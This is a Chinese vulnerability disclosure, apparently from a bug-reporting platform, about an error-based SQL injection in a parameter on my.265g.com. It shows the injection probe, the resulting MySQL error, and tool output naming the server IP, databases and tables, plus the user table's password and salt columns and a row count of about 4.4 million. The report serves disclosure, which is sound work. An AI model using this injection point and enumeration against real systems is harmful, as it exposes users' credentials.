简要描述：

265g.com。 游戏窝。440W数据 因为某分站存在严重sql漏洞导致用户信息大量泄漏。请及时修复

详细说明：

http://my.265g.com/flash.php?fgid=21'

MySQL Error

Message: MySQL Query Error

SQL: SELECT * FROM uchome_app_fgamelist Where fgid=21'

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Errno.: 1064

Click here to seek help.

不多解释，估计数据已经被他人拿到。

漏洞证明：

Target: http://my.265g.com/flash.php?fgid=21

Host IP:                        219.129.216.204

Web Server: nginx

Powered-by: PHP/5.3.6

DB Server: MySQL error based

Resp. Time(avg):           204 ms

Current User: user@127.0.0.1

Sql Version: 5.5.11

Current DB: uchome

System User: user@127.0.0.1

Host Name: qyeee

Installation dir: /usr/local/mysql

DB User: 'user'@'%'

Data Bases: information_schema

discuz

g265

test

ucenter

uchome

Count(table_name) of information_schema.tables where table_schema=0x7563656E746572 is 33

Table found: code

Table found: uc_admins

Table found: uc_applications

Table found: uc_badwords

Table found: uc_domains

Table found: uc_failedlogins

Table found: uc_feeds

Table found: uc_friends

Table found: uc_mailqueue

Table found: uc_memberfields

Table found: uc_members

Table found: uc_mergemembers

Table found: uc_newpm

Table found: uc_notelist

Table found: uc_pm_indexes

Table found: uc_pm_lists

Table found: uc_pm_members

Table found: uc_pm_messages_0

Table found: uc_pm_messages_1

Table found: uc_pm_messages_2

Table found: uc_pm_messages_3

Table found: uc_pm_messages_4

Table found: uc_pm_messages_5

Table found: uc_pm_messages_6

Table found: uc_pm_messages_7

Table found: uc_pm_messages_8

Table found: uc_pm_messages_9

Table found: uc_protectedmembers

Table found: uc_settings

Table found: uc_sqlcache

Table found: uc_tags

Table found: uc_vars

Table found: uc_wb

Count(column_name) of information_schema.columns where table_schema=0x7563656E746572 and table_name=0x75635F6D656D62657273 is 15

Column found: uid

Column found: username

Column found: password

Column found: email

Column found: myid

Column found: myidkey

Column found: regip

Column found: regdate

Column found: lastloginip

Column found: lastlogintime

Column found: salt

Column found: secques

Column found: qdjf

Column found: qdjy

Column found: openid

Database: ucenter

Table: uc_members

[15 columns]

+---------------+-----------------------+

| Column | Type |

+---------------+-----------------------+

| email | char(32) |

| lastloginip | int(10) |

| lastlogintime | int(10) unsigned |

| myid | char(30) |

| myidkey | char(16) |

| openid | varchar(50) |

| password | char(32) |

| qdjf | int(11) |

| qdjy | int(11) |

| regdate | int(10) unsigned |

| regip | char(15) |

| salt | char(6) |

| secques | char(8) |

| uid | mediumint(8) unsigned |

| username | char(15) |

+---------------+-----------------------+

Count(*) of ucenter.uc_members is 4433975

下面省略。

修复方案：

过滤

 

作者：                         Bloodwolf